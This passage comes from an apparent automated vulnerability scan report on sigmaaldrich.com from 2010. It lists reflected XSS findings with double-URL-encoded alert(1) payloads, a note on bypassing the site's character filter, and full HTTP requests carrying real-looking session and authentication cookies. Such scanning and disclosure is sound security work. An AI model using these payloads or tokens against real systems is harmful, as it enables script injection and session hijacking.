bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28980
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichdced1";alert(1)//7cc06b185b3/images/homepage-slider/november-2010/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.446. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bab2b%2522%253balert%25281%2529%252f%252fdc19e05231 was submitted in the REST URL parameter 4. This input was echoed as bab2b";alert(1)//dc19e05231 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/imagesbab2b%2522%253balert%25281%2529%252f%252fdc19e05231/homepage-slider/november-2010/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:39 GMT
Content-Length: 28979
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/imagesbab2b";alert(1)//dc19e05231/homepage-slider/november-2010/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.447. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad572%2522%253balert%25281%2529%252f%252ffd10c518c1 was submitted in the REST URL parameter 5. This input was echoed as ad572";alert(1)//fd10c518c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/homepage-sliderad572%2522%253balert%25281%2529%252f%252ffd10c518c1/november-2010/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:41 GMT
Content-Length: 28979
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/homepage-sliderad572";alert(1)//fd10c518c1/november-2010/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.448. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2353%2522%253balert%25281%2529%252f%252ff0067656cbf was submitted in the REST URL parameter 6. This input was echoed as d2353";alert(1)//f0067656cbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010d2353%2522%253balert%25281%2529%252f%252ff0067656cbf/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:43 GMT
Content-Length: 28980
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010d2353";alert(1)//f0067656cbf/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.449. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dbdf%2522%253balert%25281%2529%252f%252f24b72a3206 was submitted in the REST URL parameter 7. This input was echoed as 1dbdf";alert(1)//24b72a3206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam1dbdf%2522%253balert%25281%2529%252f%252f24b72a3206 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:45 GMT
Content-Length: 28979
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam1dbdf";alert(1)//24b72a3206","E404") ;
   </script>
...[SNIP]...

1.450. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30a98%2522%253balert%25281%2529%252f%252f3d567e605d9 was submitted in the REST URL parameter 1. This input was echoed as 30a98";alert(1)//3d567e605d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc30a98%2522%253balert%25281%2529%252f%252f3d567e605d9/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
